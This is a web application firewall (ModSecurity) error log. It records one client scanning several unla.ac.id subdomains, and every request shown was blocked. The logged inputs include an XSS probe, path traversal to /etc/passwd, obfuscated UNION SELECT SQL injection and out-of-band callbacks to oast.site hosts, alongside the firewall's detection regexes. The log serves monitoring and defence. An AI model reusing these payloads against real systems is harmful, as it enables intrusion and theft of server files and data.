[Tue Aug 29 11:44:27.412108 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13q8Co-f0AAAfAOcgAAAAH"]
[Tue Aug 29 11:44:28.397643 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13rMCo-f0AAAfZj5IAAAAN"]
[Tue Aug 29 11:44:29.431877 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfSWcAAAAAB"]
[Tue Aug 29 11:44:29.432235 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfZj5YAAAAN"]
[Tue Aug 29 11:44:29.441366 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfGadwAAAAT"]
[Tue Aug 29 11:44:29.459841 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAe3@DAAAAAA"]
[Tue Aug 29 11:44:29.467237 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfWN3wAAAAL"]
[Tue Aug 29 11:44:30.905559 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13rsCo-f0AAAg4DX8AAAAI"]
[Tue Aug 29 11:44:32.358639 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAftVF8AAAAf"]
[Tue Aug 29 11:44:32.415018 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAftVGAAAAAf"]
[Tue Aug 29 11:44:32.440564 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAftVGEAAAAf"]
[Tue Aug 29 11:44:32.441845 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAfkzBYAAAAi"]
[Tue Aug 29 11:44:32.455925 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAenGhcAAAAM"]
[Tue Aug 29 11:44:33.416339 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13scCo-f0AAAfg7zIAAAAe"]
[Tue Aug 29 11:44:35.392182 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gi7rbnas95kw61.oast.site found within TX:1: cjmnbitjmimt14dgn26gi7rbnas95kw61.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAg@-@wAAAAQ"]
[Tue Aug 29 11:44:35.399405 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gtrpq7d8kmiceg.oast.site found within TX:1: cjmnbitjmimt14dgn26gtrpq7d8kmiceg.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfVkb8AAAAD"]
[Tue Aug 29 11:44:35.414691 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAg@-@0AAAAQ"]
[Tue Aug 29 11:44:35.418557 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gy4nt68i4xxens.oast.site found within TX:1: cjmnbitjmimt14dgn26gy4nt68i4xxens.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfGaeAAAAAT"]
[Tue Aug 29 11:44:35.435322 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAg@-@4AAAAQ"]
[Tue Aug 29 11:44:35.435725 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gkmiu3nfg95buw.oast.site found within TX:1: cjmnbitjmimt14dgn26gkmiu3nfg95buw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAhBR@8AAAAX"]
[Tue Aug 29 11:44:35.437422 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAfloUYAAAAj"]
[Tue Aug 29 11:44:35.445618 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAg4DZgAAAAI"]
[Tue Aug 29 11:44:35.497389 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAfiYooAAAAg"]
[Tue Aug 29 11:44:36.365419 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gz5qs9zwub9pyk.oast.site found within TX:1: cjmnbitjmimt14dgn26gz5qs9zwub9pyk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAdftj8AAAAG"]
[Tue Aug 29 11:44:36.391103 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13tMCo-f0AAAdftkAAAAAG"]
[Tue Aug 29 11:44:36.414443 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gqznayqq41iyro.oast.site found within TX:1: cjmnbitjmimt14dgn26gqznayqq41iyro.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAg-pHIAAAAR"]
[Tue Aug 29 11:44:43.525685 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfg71gAAAAe"]
[Tue Aug 29 11:44:43.544004 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAARphFgAAAAU"]
[Tue Aug 29 11:44:43.558789 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfVkdgAAAAD"]
[Tue Aug 29 11:44:43.596780 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfVkdkAAAAD"]
[Tue Aug 29 11:44:44.359258 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAhISNoAAAAH"]
[Tue Aug 29 11:44:44.379511 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAg@AAQAAAAQ"]
